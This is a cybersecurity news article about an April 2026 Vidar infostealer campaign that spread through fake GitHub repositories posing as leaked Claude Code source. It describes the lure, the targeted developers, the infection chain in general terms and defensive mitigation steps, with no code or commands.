Vidar Campaign Exploits Claude Code Source Leak
Cybercriminals launched a sophisticated malware campaign on April 2, 2026, exploiting the recent leak of Anthropic's Claude Code source code to distribute Vidar information-stealing malware. The attackers created multiple fake GitHub repositories claiming to contain the leaked Claude AI development framework, targeting developers and security researchers eager to examine the proprietary code.
The malicious campaign began within hours of the Claude Code leak becoming public knowledge. Threat actors quickly registered GitHub accounts with names closely resembling legitimate Anthropic developers and created repositories with convincing titles like "claude-code-official-leak" and "anthropic-claude-source-mirror." These repositories contained what appeared to be legitimate source code files alongside hidden malware payloads disguised as build scripts and dependency files.
Security researchers from The Hacker News first identified the campaign after detecting suspicious download patterns from newly created GitHub repositories. The attackers employed social engineering tactics by posting links to their malicious repositories in developer forums, Discord channels, and social media platforms where discussions about the Claude Code leak were trending.
The Vidar malware variant used in this campaign includes enhanced capabilities specifically designed to target development environments. Unlike standard Vidar deployments, this version actively searches for API keys, development certificates, and source code repositories stored on infected systems. The malware also attempts to steal credentials from popular development tools including Visual Studio Code, JetBrains IDEs, and Git credential managers.
Related: AI-Generated Slopoly Malware Powers Interlock Ransomware
Related: BeatBanker Android Banking Malware 2026: Fake Starlink App
Related: Infiniti Stealer Targets Mac Users via Fake Cloudflare
Related: GlassWorm Malware Hijacks GitHub Tokens to Poison Python
Analysis of the malicious repositories reveals sophisticated obfuscation techniques. The attackers embedded the Vidar payload within seemingly legitimate Python setup scripts and Node.js package files. When developers attempt to run or analyze the "leaked" code, these scripts execute silently in the background, establishing persistence on the target system and beginning the data exfiltration process.
Developer Community and Enterprise Development Teams at Risk
The primary targets of this campaign are software developers, AI researchers, and security professionals interested in examining the leaked Claude Code. Organizations with development teams actively researching large language model implementations face particular risk, as employees may attempt to download and analyze the supposedly leaked source code for competitive intelligence or security research purposes.
Enterprise environments running Windows 10 and Windows 11 workstations are most vulnerable to the Vidar payload. The malware specifically targets development workstations with elevated privileges, making it particularly dangerous for organizations where developers have administrative access to their systems. Companies in the artificial intelligence, machine learning, and software development sectors represent high-value targets due to the sensitive intellectual property and API credentials typically stored on developer machines.
The campaign has already compromised an estimated 2,400 systems based on command-and-control server telemetry observed by security researchers. Affected organizations span multiple industries, with technology companies, financial services firms, and government contractors reporting suspicious activity consistent with Vidar infections. The malware's focus on development environments means that compromised systems often contain access to production repositories, cloud development platforms, and sensitive customer data.
Small to medium-sized development teams face heightened risk due to limited security controls and monitoring capabilities. Many smaller organizations lack the endpoint detection and response tools necessary to identify Vidar's stealthy installation and data collection activities. The malware's ability to steal stored credentials and API keys can lead to secondary compromises of cloud infrastructure and customer systems.
Vidar Infection Chain and Immediate Response Actions
The Vidar malware deploys through a multi-stage infection process that begins when users download and execute files from the malicious GitHub repositories. The initial payload masquerades as a Python requirements installer or Node.js dependency manager, executing PowerShell commands that download additional components from compromised WordPress sites and legitimate cloud storage services.
Organizations should immediately implement network-level blocking for known Vidar command-and-control domains identified in the campaign. Security teams must monitor for outbound connections to suspicious domains and implement application whitelisting to prevent unauthorized executables from running on development workstations. SecurityWeek reports that the malware communicates with C2 servers using encrypted HTTPS traffic, making detection more challenging without proper SSL inspection capabilities.
Immediate mitigation steps include scanning all development workstations for indicators of compromise, particularly focusing on systems where users may have downloaded files related to the Claude Code leak. IT administrators should check for the presence of suspicious PowerShell execution logs, unusual network traffic patterns, and unauthorized modifications to browser credential stores. The malware creates persistence through scheduled tasks and registry modifications that can be detected using standard endpoint monitoring tools.
For systems confirmed to be infected, organizations must assume that all stored credentials, API keys, and development certificates have been compromised. This requires immediate rotation of all development-related authentication tokens, revocation of potentially compromised certificates, and comprehensive audit of code repositories for unauthorized access. Security teams should also implement additional monitoring for any cloud resources accessible through potentially stolen credentials, as Vidar specifically targets cloud platform access tokens and deployment keys.
